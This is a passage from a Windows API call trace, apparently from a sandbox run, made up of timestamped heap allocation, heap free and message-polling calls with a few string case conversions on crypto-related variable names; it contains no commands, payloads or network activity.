Size=0x20) returned 0x2e542d8 [0130.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0130.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0130.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0130.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0130.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0130.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0130.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0130.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0130.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0130.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0130.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0130.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0130.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0130.497] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0130.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0130.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0130.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0130.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0130.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0130.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0130.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0130.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0130.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0130.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0130.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0130.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0130.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0130.498] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0130.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0130.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0130.498] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0130.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0130.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0130.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0130.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0130.498] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0130.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0130.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdc0 [0130.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0130.498] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0130.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdc0 | out: hHeap=0x970000) returned 1 [0130.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0130.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0130.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0130.498] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0130.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0130.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0130.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0130.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0130.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0130.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0130.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0130.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0130.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0130.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0130.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0130.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0130.499] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0130.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0130.499] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0130.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0130.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0130.499] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0130.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0130.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0130.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0130.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0130.499] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0130.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0130.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0130.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0130.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0130.499] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0130.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0130.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0130.499] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0130.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0130.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0130.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0130.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0130.500] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0130.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0130.500] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0130.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0130.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0130.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0130.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0130.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0130.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0130.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0130.500] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0130.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0130.502] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0130.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0130.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0130.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0130.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0130.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801e8 [0130.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0130.613] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0130.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801e8 | out: hHeap=0x970000) returned 1 [0130.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0130.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507b8 [0130.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0130.613] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0130.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0130.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0130.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0130.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0130.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0130.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0130.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0130.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0130.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0130.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0130.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0130.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0130.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0130.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0130.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0130.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0130.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0130.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0130.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0130.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0130.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0130.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0130.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0130.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0130.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0130.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0130.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0130.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0130.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0130.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0130.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0130.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0130.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0130.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0130.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0130.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0130.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0130.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0130.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0130.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0130.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0130.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0130.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0130.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0130.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0130.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0130.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0130.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0130.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0130.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0130.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0130.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0130.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0130.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0130.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0130.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0130.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0130.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0130.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0130.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0130.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0130.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0130.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0130.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0130.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1651a) returned 0x2ee32b8 [0130.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0130.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ee32b8 | out: hHeap=0x970000) returned 1 [0130.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0130.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0130.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0130.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0130.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0130.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0130.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0130.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0130.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0130.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0130.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0130.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0130.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0130.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0130.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0130.643] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0130.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0130.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0130.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0130.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0130.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0130.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0130.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0130.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0130.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0130.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0130.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0130.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0130.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0130.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0130.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0130.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0130.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0130.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0130.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0130.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0130.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0130.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0130.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0130.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0130.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0130.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0130.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0130.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0130.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0130.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0130.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0130.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0130.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0130.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0130.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0130.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0130.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0130.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0130.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0130.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0130.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0130.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0130.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0130.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0130.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0130.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0130.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0130.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0130.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0130.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0130.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0130.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0130.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0130.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0130.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 